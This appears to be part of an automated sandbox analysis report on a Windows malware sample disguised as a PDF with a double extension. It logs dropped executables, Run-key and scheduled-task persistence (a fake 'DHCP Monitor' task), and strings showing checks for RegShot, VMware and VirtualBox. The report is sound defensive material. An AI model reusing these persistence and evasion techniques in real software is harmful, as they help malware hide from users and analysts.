      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

      Boot Survival

      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete
      Source: Possible double extension: pdf.scrStatic PE information: 004349256789197.pdf.scr.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C325A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00C325A0
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.332616328.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.315942638.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")`
      Source: ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475601066.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.478174099.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475387940.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477979894.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXESS
      Source: ihgsvw.exe, 00000021.00000003.477385380.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475550316.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475281138.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477100320.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477315670.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475335079.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
      Source: ihgsvw.exe, 00000023.00000003.495486843.00000000016B2000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000002.498875275.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.497141076.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494456875.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493999375.00000000016A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN\N`V
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEKW
      Source: ihgsvw.exe, 00000015.00000003.382971984.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381984041.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383092560.0000000000DCD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382181894.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381251567.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")^\
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334500241.0000000001730000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386006427.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES
      Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_6-64713
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752 Thread sleep count: 63 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752 Thread sleep count: 85 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236 Thread sleep count: 61 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236 Thread sleep count: 79 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6084 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968 Thread sleep count: 31 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968 Thread sleep count: 117 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5324 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756 Thread sleep count: 63 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756 Thread sleep count: 105 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080 Thread sleep count: 64 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080 Thread sleep count: 88 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712 Thread sleep count: 62 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712 Thread sleep count: 106 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752 Thread sleep count: 60 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752 Thread sleep count: 114 > 30
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Evasive API call chain: GetLocalTime, DecisionNodes graph_0-23511
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: threadDelayed 9453
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: foregroundWindowGot 1561
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe API coverage: 8.4 %
      Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe API call chain: ExitProcess graph end node graph_0-23661
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
      Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then#+
      Source: ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exey
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
      Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
      Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe:
      Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe
